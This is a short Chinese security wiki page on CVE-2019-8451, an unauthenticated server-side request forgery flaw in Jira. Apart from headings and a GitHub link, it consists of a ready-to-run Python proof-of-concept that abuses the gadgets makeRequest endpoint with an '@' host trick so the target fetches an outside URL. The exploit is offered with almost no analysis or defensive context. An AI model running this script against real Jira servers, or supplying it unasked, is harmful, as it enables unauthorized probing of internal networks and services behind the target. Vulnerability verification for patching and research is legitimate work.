(CVE-2019-8451)Jira未授权SSRF漏洞验证

一、漏洞简介

(CVE-2019-8451)Jira未授权SSRF漏洞验证

二、影响范围

三、复现过程

image

https://github.com/ianxtianxt/CVE-2019-8451

#coding:utf-8
import requests

host = 'http://xx.xx.xx.xx:8080'
header = {
                        'X-Atlassian-Token': 'no-check',
                        'Connection': 'close'
                }

url = host + '/plugins/servlet/gadgets/makeRequest?url='+host+'@www.baidu.com/'
html = requests.get(url = url,headers = header)
print html.text
零组资料文库 all right reserved,powered by 0-sec.org未经授权禁止转载 2019-11-04 00:39:10

results matching ""

    No results matching ""